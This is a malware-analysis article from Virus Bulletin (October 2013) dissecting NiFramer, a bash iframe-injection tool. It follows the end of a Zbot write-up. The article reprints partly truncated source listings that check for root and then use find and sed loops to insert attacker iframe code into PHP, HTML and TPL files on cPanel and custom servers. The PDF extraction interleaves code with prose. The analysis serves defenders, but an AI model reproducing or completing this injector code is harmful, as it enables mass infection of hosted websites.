way of doing things compared with other malware. Instead of using the GetWindowsDirectory API to get the %windir% folder, it uses the newer SHGetFolderPathW API. Instead of checking the process names for anti-malware strings, it looks for the product name of the actual file in the disk. And generating 624 random DWORD values a few times just to generate a single DWORD is probably a little excessive. Zbot is one of the main players in the malware underground. Its structure is as well coded as it is designed. It has lots of functionalities and capabilities, and this article only touches on a small percentage of them. As we have seen so far, there is always room for enhancements and upgrades pertaining to its code. We are likely to see further adaptation of Zbot to its ecosystem and its environment in the near future. As always, we will be there to keep you up to date. 12 OCTOBER 2013 INFECTION MODEL AND COMPONENTS A simple infection model is explained below: • The attacker targets end-user machines to install malware. • Once the malware is installed, it exfiltrates data from the end-user systems. • The attacker retrieves the credentials (username, password) of the hosting server and uses the stolen credentials to gain access to it. (There are a number of other ways to gain access to hosting servers, which include but are not limited to: exploiting vulnerabilities, brute-forcing attacks, privilege escalations, etc.). • The compromised server may have thousands of websites hosted on it. From the attacker’s perspective, it is not feasible to edit and infect one website at a time by injecting a malicious iframe into the web pages. To automate this process, the attacker uses an iframe
  • 2. VIRUS BULLETIN www.virusbtn.com injector tool which infects a large number of websites in one go. A basic outline of the NiFramer iframe injector is shown in Figure 1. Key validation Before the execution of NiFramer code, the iframe injector looks for a file named ‘niframer.txt’, which carries a secret key in the form of an MD5. The purpose of this key in the context of NiFramer is not clear. It could be an additional verification check if NiFramer is embedded within another software component – the key is required to execute NiFramer. It basically reads the file ‘niframer.key’ and outputs the value in variable ‘key’. This is matched against a hard-coded MD5/SHA key for verification and validation. If the key validation fails, two or three more attempts are made before NiFramer exits and stops the execution on the compromised server. A temporary file (/tmp/keyseq) is created for recording the number of attempts made. The embedded key does not appear to have any purpose if NiFramer is used as a standalone tool. Listing 1 shows a code snippet revealing how the key is validated. If the key is validated, the code triggers the file_check function. Injection file validation Figure 1: NiFramer injector in action. The iframe injector reads the injection code (iframe code pointing to a domain serving malware) from a file. Instead The various components of NiFramer are as follows: • The main() function is called to execute the subroutines. key_check() { if [ -f niframer.key ] then • The key_check() function is called to validate the NiFramer key. The key is required for validation when NiFramer is embedded within a framework. key=`cat niframer.key` • The file_check() function is called to verify the presence of a file containing the iframe injection. echo “ERROR: Key Invalid.” • The priv_check() function is executed to check for root access on the compromised server. • The server_software_selection() function is used to provide options for the server-side hosting software, i.e. to specify whether the server is running cPanel or a custom installation. • The iframe_injection() function is executed to trigger iframe injection in a specific folder for previously chosen files such as HTML and PHP. • The clean_environment() function removes temporary files and any hidden files generated during the injection process. We will discuss each of these components in the next section. if [ “$key” != “<Insert Key>” ]; then if [ -f /tmp/keyseq ]; then if [ “$((`cat /tmp/keyseq` + 1))” -gt 2 ]; then echo “0 retries left. Now removing self.” else echo “$((`cat /tmp/keyseq` + 1))” > /tmp/keyseq && echo “Retries Left:” “$((3 - `cat /tmp/keyseq`))” fi else echo “Retries Left: 2” echo 1 > /tmp/keyseq fi else echo “Key Found... initializing...” file_check fi else echo “ERROR: Key file not found.” DISSECTING NIFRAMER COMPONENTS This section details NiFramer’s components and the requisite code used to implement them. exit fi} Listing 1: Key validation check. OCTOBER 2013 13
  • 3. VIRUS BULLETIN www.virusbtn.com of the iframe injection being hard coded, the injector is designed to read from a file in order to interpret injections for modularity and extensibility. Placing the iframe injection in a file makes it easy for the attackers to update the injections. NiFramer performs a file check as shown in Listing 2. file_check() { if [ -f infect.txt ] then priv_check else echo “infect.txt is missing, please make the file with your code included” fi} priv_check() { if [ `whoami` != “root” ] then echo “Must be ran as root.” exit else echo “###################” echo “# NiFramer by ……...#” echo “###################” softwareami fi } ---------- Truncated ------------------------- Listing 3: Privilege access rights check. Listing 2: Iframe injection file validation. softwareami() { Privilege check The iframe injector performs a privilege (i.e. access rights) check after validating the existence of the injection file. The idea is to determine whether or not the attacker has root access on the compromised server. This check is necessary because non-super-user access can skew the iframe injection process. This is because restricted accounts might not have the necessary access rights to write and update the web pages of different hosts present on the server. NiFramer requires root access in order to carry out the injection process successfully. As shown in Listing 3, the iframe injector uses the ‘whoami’ command to check for root access on the server. If the attacker has root access, the next module is executed to initiate the iframe injection process. If the attacker does not have root access, the injection tool exits and becomes dormant. Installed software selection Once root access has been verified, the type of software installed on the compromised server must be specified. The version of NiFramer we analysed has two options: cPanel web server software or custom web server software. The attacker selects the appropriate option and NiFramer executes the relevant code for the selected software. Listing 4 shows the code used to check for the installed software. Iframe injection Once the attacker has specified the hosting server software, NiFramer loads the respective component for performing iframe injections. NiFramer has the capability to inject into HTML, PHP and TPL files1. This functionality can PS3=’Choose the system web server type: ‘ Select software in “CPanel” “Custom” # Will add more definitions later. do $software done} ---------- Truncated ------------------------- Listing 4: Installed software type. be extended to include additional files which can also be injected into based on the requirement. The infection flow in custom web software is as follows: • NiFramer uses the ‘find’ command to detect the presence of PHP, HTML and TPL files and exempts a list of files by declaring a global array containing exempted entries. NiFramer provides an exemption code to list the type of files that should not be injected. Listing 5 shows how exemptions are declared. NiFramer will not inject into config.php, configuration.php and settings.php. exempt=(“! -name config.php” “! -name configuration. php” “! -name settings.php” “! -name inc”); Listing 5: File type exemption. • If the relevant files are detected, NiFramer searches for the pattern using the ‘sed’ command and injects the iframe code into the space between the <html> and </html> tags. Listing 6 shows how the custom hosting software is searched and web pages are injected. 1 ‘The TPL file extension is used [in] PHP web development and PHP web applications as a template file. [It is] mostly used by [the] Smarty template engine. [The] template is a common text source code file and contains user-predefined variables that are replaced by user-defined 14 OCTOBER 2013 output content when [a] PHP web application [is] parsing a template file or files and generating a web page or other output format.’ (http://tpl.fileextensionguide.com/)
  • 4. VIRUS BULLETIN www.virusbtn.com custom() { echo -n “Please enter directory of home folders: “ read home_dir cd $home_dir echo “Starting injection of PHP files” CPanel() { echo “Scanning $(ls /home/ | wc -l) directorys for files. This could take a while...” cd /home/ sleep 5 echo “Starting injection of PHP files” sleep 5 for i in $(find `pwd` -name ‘*.php’ ${exempt[@]}) for i in $(find `pwd` -name ‘*.php’ ${exempt[@]}) do do echo Injecting “$i” echo Injecting “$i” cat $i > $i.tmp && cat $i.tmp | sed s/<html>/ <html>”$code”/g > $i rm -f $i.tmp done # Similarly for HTML and TPL files -------------------- Truncated ----------------------- cat $i > $i.tmp && cat $i.tmp | sed s/<html>/ <html>”$code”/g > $i rm -f $i.tmp done # Similarly for HTML and TPL files echo “Completed injection of found files.” Listing 6: Injecting iframe into custom web server software. The infection flow in cPanel software is as follows: • NiFramer traverses the ‘home’ directory to determine the number of hosts present on the server and to get an idea of the number of iframe injections to be performed. It then jumps into the home directory to initiate the process. • It checks for the presence of HTML, PHP and TPL files, as in the case of custom hosting server software, and starts the injection process. The injection is performed in a similar fashion to that used for custom software – the iframe is injected between the <html> and </html> tags. • In cPanel iframe injection, NiFramer performs an additional check for the presence of index files. If no index file is found on the server in the respective host directory, NiFramer creates one and injects an iframe into it. This is to provide additional assurance that the iframe has been injected. cd /root/cpanel3-skel/public_html/ if [ $(ls | grep html); then for i in $(find `pwd` -name ‘*.html’ ${exempt[@]}) do echo Injecting “$i” cat $i > $i.tmp && cat $i.tmp | sed s/<html>/ <html>”$code”/g > $i rm -f $i.tmp done else echo “No HTML files found in /root/cpanel3-skel/ public_html/” echo “Creating index.html..” echo $code > index.html sleep 1 fi echo “Completed injection of skeleton directory.” echo “Starting injection into CPanel & WHM template files (The panel itself)” Listing 7 shows how NiFramer infects cPanel software. Listing 7: Injecting iframe into cPanel server software. CLEAN ENVIRONMENT Once the iframes have been injected into the web pages, NiFramer cleans up the temporary files created during the injection process. The idea is to remove all traces of the injection process to try to make it as stealthy as possible. The ‘rm’ command is used to delete the temporary (.tmp) files. • We will be looking at other iframe injector code in our future research. The aim is to start with the most basic and delve deeper into more complex code. We plan to look at the ZFramer and Citadel injectors next. CONCLUSION ADDITIONAL NOTES • The code of NiFramer is not complex (in the way it is constructed). It is written in bash scripting language, but it serves its purpose and the code has been used in the wild. This article presents the design of a very basic iframe injector tool known as NiFramer. Using an automated iframe injector tool, an attacker can easily automate the injection process and perform distributed infections, thereby infecting hundreds of web servers in just seconds. OCTOBER 2013 15